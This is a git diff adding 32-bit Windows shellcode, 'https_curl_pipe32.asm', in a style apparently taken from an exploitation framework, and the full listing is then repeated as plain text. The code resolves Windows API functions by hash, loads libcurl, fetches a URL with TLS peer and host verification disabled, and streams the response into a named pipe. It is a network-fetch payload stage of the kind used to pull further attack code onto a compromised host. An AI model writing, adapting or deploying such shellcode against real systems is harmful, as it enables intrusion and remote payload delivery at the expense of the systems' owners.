phikshun · September 3, 2012 17:53
diff --git a/https_curl_pipe32.asm b/https_curl_pipe32.asm

 %define u(x) __utf16__(x)
 [BITS 32]
 [ORG 0]

  cld
  mov    esi, esp  ; ESI points to the current postion of the stack (for ref local var)
  sub    esp, 0x2000 ; Alloc some space on stack
  call   start
 delta:
 %include "block_api32.asm"
 start:
  pop    ebp
  mov    dword [esi-32], ebp ; we'll need this later
  
  xor    eax, eax
  push   eax
  push   eax
  push   0x03    ; OPEN_EXISTING
  push   eax
  push   eax
  push   0x40000000  ; GENERIC_WRITE
  lea    ecx, [ebp+szPipeName-delta]
  push   ecx      ; \\.\pipe\foo
  push   0x4FDAF6DA  ; CreateFileA
  call   ebp
  
  xor    ecx, ecx  ; check for errors...
  sub    ecx, 1
  cmp    eax, ecx
  je     error_found ; INVALID_HANDLE_VALUE = -1
  mov    dword [esi-28], eax  ; [esi-28] => hFile
  
  lea    eax, [ebp+szLibcurl-delta]
  push   eax
  push   0x0726774C      ; hash( "kernel32.dll", "LoadLibraryA" )
  call   ebp             ; LoadLibraryA("libcurl.dll");
  test   eax, eax    ; make sure libcurl.dll can be found
  jz     error_found
  mov    dword [esi], eax ; [esi-0] => hModuleLibcurl

  lea    ecx, [ebp+szCurlGlobalInit-delta]
  push   ecx
  mov    edx, [esi]    ; hModuleLibcurl
  push   edx
  push   0x7802F749    ; hash( "kernel32.dll", "GetProcAddress" )
  call   ebp        ; GetProcAddress(hModuleLibcurl, szCurlGlobalInit);
  mov    dword [esi-4], eax ; [esi-4] => curl_global_init

  lea    ecx, [ebp+szCurlEasyInit-delta]
  push   ecx
  mov    edx, [esi]    ; hModuleLibcurl
  push   edx
  push   0x7802F749    ; hash( "kernel32.dll", "GetProcAddress" )
  call   ebp        ; GetProcAddress(hModuleLibcurl, szCurlEasyInit);
  mov    dword [esi-8], eax ; [esi-8] => curl_easy_init  
  
  lea    ecx, [ebp+szCurlEasySetopt-delta]
  push   ecx
  mov    edx, [esi]    ; hModuleLibcurl
  push   edx
  push   0x7802F749    ; hash( "kernel32.dll", "GetProcAddress" )
  call   ebp        ; GetProcAddress(hModuleLibcurl, szCurlEasySetopt);
  mov    dword [esi-12], eax ; [esi-12] => curl_easy_setopt

  lea    ecx, [ebp+szCurlEasyPerform-delta]
  push   ecx
  mov    edx, [esi]    ; hModuleLibcurl
  push   edx
  push   0x7802F749    ; hash( "kernel32.dll", "GetProcAddress" )
  call   ebp        ; GetProcAddress(hModuleLibcurl, szCurlEasyPerform);
  mov    dword [esi-16], eax ; [esi-16] => curl_easy_perform

  lea    ecx, [ebp+szCurlEasyCleanup-delta]
  push   ecx
  mov    edx, [esi]    ; hModuleLibcurl
  push   edx
  push   0x7802F749    ; hash( "kernel32.dll", "GetProcAddress" )
  call   ebp        ; GetProcAddress(hModuleLibcurl, szCurlEasyCleanup);
  mov    dword [esi-20], eax ; [esi-20] => curl_easy_cleanup
  
  push   0x3        ; (CURL_GLOBAL_WIN32 | CURL_GLOBAL_SSL)
  call   dword [esi-4]  ; curl_global_init
  
  call   dword [esi-8]  ; curl_easy_init
  mov    dword [esi-24], eax ; [esi-24] => CURL *curl
  test   eax, eax    ; make sure curl is loaded
  jz     error_found
  
  lea    ecx, [ebp+post_params-delta]
  xor    ebx, ebx
  mov    bl, byte [ecx]
  test   ebx, ebx    ; test first byte of post_params
  jz     skip_post    ; to see if we are making a post req
  
  push   ecx        ; post_params
  push   10015      ; CURLOPT: CURLOPT_POSTFIELDS
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-12]  ; curl_easy_setopt( curl, CURLOPT_POSTFIELDS, post_params );
  
 skip_post:
  lea    ecx, [ebp+server_url-delta]
  push   ecx        ; URL
  push   10002      ; CURLOPT: CURLOPT_URL
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-12]  ; curl_easy_setopt( curl, CURLOPT_URL, URL );
  
  lea    ecx, [ebp+start_pipe-delta]
  push   ecx        ; write_data
  push   20011      ; CURLOPT: CURLOPT_WRITEFUNCTION
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-12]  ; curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, write_data );
  
  push   esi        ; pointer to variables
  push   10001      ; CURLOPT: CURLOPT_WRITEDATA
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-12]  ; curl_easy_setopt( curl, CURLOPT_WRITEDATA, pVariables );
  
  xor    ecx, ecx
  push   ecx        ; 0L
  push   64        ; CURLOPT: CURLOPT_SSL_VERIFYPEER
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-12]  ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYPEER, 0L );  

  xor    ecx, ecx
  push   ecx        ; 0L
  push   81        ; CURLOPT: CURLOPT_SSL_VERIFYHOST
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-12]  ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYHOST, 0L );
  
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-16]  ; curl_easy_perform(curl);
  
  mov    edx, dword [esi-24] ; *curl
  push   edx
  call   dword [esi-20]  ; curl_easy_cleanup(curl);

 error_found:
  push   byte 0       ; push the exit function parameter
  push   0x6F721347   ; ntdll.dll!RtlExitUserThread
  call   ebp          ; call EXITFUNK( 0 );
  
 start_pipe:
  push   ebp
  mov    ebp, esp
  sub    esp, 8
  
  push   edi
  push   esi
  push   ebx
  push   edx
  
  xor    eax, eax
  mov    dword [ebp-4], eax
  lea    edi, [ebp-4] ; allocate for dwBytesWritten
  
  mov    eax, dword [ebp+20]
  mov    ebx, dword [eax-28] ; save hFile in ebx
  
  mov    esi, dword [ebp+8]  ; buffer
  mov    eax, dword [ebp+12] ; size
  mov    ecx, dword [ebp+16]  ; nmemb
  mul    ecx          ; result in eax
  
  xor    ecx, ecx
  push   ecx      ; NULL
  push   edi      ; &dwBytesWritten
  push   eax      ; buffer size
  push   esi      ; source buffer
  push   ebx      ; hFile
  push   0x5BAE572D  ; WriteFile
  mov    eax, dword [ebp+20]
  call   dword [eax-32] ; old api call pointer
  mov    eax, dword [edi] ; return dwBytesWritten
  
  pop    edx
  pop    ebx
  pop    esi
  pop    edi
  
  mov    esp, ebp
  pop    ebp
  ret

 szPipeName:
  db '\\.\pipe\foo', 0
  times 4 db 0
 szLibcurl:
  db 'libcurl.dll', 0
 szCurlGlobalInit:
  db 'curl_global_init', 0
 szCurlEasyInit:
  db 'curl_easy_init', 0
 szCurlEasySetopt:
  db 'curl_easy_setopt', 0
 szCurlEasyPerform:
  db 'curl_easy_perform', 0
 szCurlEasyCleanup:
  db 'curl_easy_cleanup', 0
 server_url:
  db 'http://www.google.ca/s?q=lolcat', 0
  times 32 db 0
 post_params:
  db 0

	%define u(x) __utf16__(x)
	[BITS 32]
	[ORG 0]

	cld
	mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
	sub esp, 0x2000 ; Alloc some space on stack
	call start
	delta:
	%include "block_api32.asm"
	start:
	pop ebp
	mov dword [esi-32], ebp ; we'll need this later

	xor eax, eax
	push eax
	push eax
	push 0x03 ; OPEN_EXISTING
	push eax
	push eax
	push 0x40000000 ; GENERIC_WRITE
	lea ecx, [ebp+szPipeName-delta]
	push ecx ; \\.\pipe\foo
	push 0x4FDAF6DA ; CreateFileA
	call ebp

	xor ecx, ecx ; check for errors...
	sub ecx, 1
	cmp eax, ecx
	je error_found ; INVALID_HANDLE_VALUE = -1
	mov dword [esi-28], eax ; [esi-28] => hFile

	lea eax, [ebp+szLibcurl-delta]
	push eax
	push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
	call ebp ; LoadLibraryA("libcurl.dll");
	test eax, eax ; make sure libcurl.dll can be found
	jz error_found
	mov dword [esi], eax ; [esi-0] => hModuleLibcurl

	lea ecx, [ebp+szCurlGlobalInit-delta]
	push ecx
	mov edx, [esi] ; hModuleLibcurl
	push edx
	push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
	call ebp ; GetProcAddress(hModuleLibcurl, szCurlGlobalInit);
	mov dword [esi-4], eax ; [esi-4] => curl_global_init

	lea ecx, [ebp+szCurlEasyInit-delta]
	push ecx
	mov edx, [esi] ; hModuleLibcurl
	push edx
	push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
	call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyInit);
	mov dword [esi-8], eax ; [esi-8] => curl_easy_init

	lea ecx, [ebp+szCurlEasySetopt-delta]
	push ecx
	mov edx, [esi] ; hModuleLibcurl
	push edx
	push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
	call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasySetopt);
	mov dword [esi-12], eax ; [esi-12] => curl_easy_setopt

	lea ecx, [ebp+szCurlEasyPerform-delta]
	push ecx
	mov edx, [esi] ; hModuleLibcurl
	push edx
	push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
	call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyPerform);
	mov dword [esi-16], eax ; [esi-16] => curl_easy_perform

	lea ecx, [ebp+szCurlEasyCleanup-delta]
	push ecx
	mov edx, [esi] ; hModuleLibcurl
	push edx
	push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
	call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyCleanup);
	mov dword [esi-20], eax ; [esi-20] => curl_easy_cleanup

	push 0x3 ; (CURL_GLOBAL_WIN32 \| CURL_GLOBAL_SSL)
	call dword [esi-4] ; curl_global_init

	call dword [esi-8] ; curl_easy_init
	mov dword [esi-24], eax ; [esi-24] => CURL *curl
	test eax, eax ; make sure curl is loaded
	jz error_found

	lea ecx, [ebp+post_params-delta]
	xor ebx, ebx
	mov bl, byte [ecx]
	test ebx, ebx ; test first byte of post_params
	jz skip_post ; to see if we are making a post req

	push ecx ; post_params
	push 10015 ; CURLOPT: CURLOPT_POSTFIELDS
	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_POSTFIELDS, post_params );

	skip_post:
	lea ecx, [ebp+server_url-delta]
	push ecx ; URL
	push 10002 ; CURLOPT: CURLOPT_URL
	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_URL, URL );

	lea ecx, [ebp+start_pipe-delta]
	push ecx ; write_data
	push 20011 ; CURLOPT: CURLOPT_WRITEFUNCTION
	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, write_data );

	push esi ; pointer to variables
	push 10001 ; CURLOPT: CURLOPT_WRITEDATA
	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_WRITEDATA, pVariables );

	xor ecx, ecx
	push ecx ; 0L
	push 64 ; CURLOPT: CURLOPT_SSL_VERIFYPEER
	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYPEER, 0L );

	xor ecx, ecx
	push ecx ; 0L
	push 81 ; CURLOPT: CURLOPT_SSL_VERIFYHOST
	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYHOST, 0L );

	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-16] ; curl_easy_perform(curl);

	mov edx, dword [esi-24] ; *curl
	push edx
	call dword [esi-20] ; curl_easy_cleanup(curl);

	error_found:
	push byte 0 ; push the exit function parameter
	push 0x6F721347 ; ntdll.dll!RtlExitUserThread
	call ebp ; call EXITFUNK( 0 );

	start_pipe:
	push ebp
	mov ebp, esp
	sub esp, 8

	push edi
	push esi
	push ebx
	push edx

	xor eax, eax
	mov dword [ebp-4], eax
	lea edi, [ebp-4] ; allocate for dwBytesWritten

	mov eax, dword [ebp+20]
	mov ebx, dword [eax-28] ; save hFile in ebx

	mov esi, dword [ebp+8] ; buffer
	mov eax, dword [ebp+12] ; size
	mov ecx, dword [ebp+16] ; nmemb
	mul ecx ; result in eax

	xor ecx, ecx
	push ecx ; NULL
	push edi ; &dwBytesWritten
	push eax ; buffer size
	push esi ; source buffer
	push ebx ; hFile
	push 0x5BAE572D ; WriteFile
	mov eax, dword [ebp+20]
	call dword [eax-32] ; old api call pointer
	mov eax, dword [edi] ; return dwBytesWritten

	pop edx
	pop ebx
	pop esi
	pop edi

	mov esp, ebp
	pop ebp
	ret

	szPipeName:
	db '\\.\pipe\foo', 0
	times 4 db 0
	szLibcurl:
	db 'libcurl.dll', 0
	szCurlGlobalInit:
	db 'curl_global_init', 0
	szCurlEasyInit:
	db 'curl_easy_init', 0
	szCurlEasySetopt:
	db 'curl_easy_setopt', 0
	szCurlEasyPerform:
	db 'curl_easy_perform', 0
	szCurlEasyCleanup:
	db 'curl_easy_cleanup', 0
	server_url:
	db 'http://www.google.ca/s?q=lolcat', 0
	times 32 db 0
	post_params:
	db 0